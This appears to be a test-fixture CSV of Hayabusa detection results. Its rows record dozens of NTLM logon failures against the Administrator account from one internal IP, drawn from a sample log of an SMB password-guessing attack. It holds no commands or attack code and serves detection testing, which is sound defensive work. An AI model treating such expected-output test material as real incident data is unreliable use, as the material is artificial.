+2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
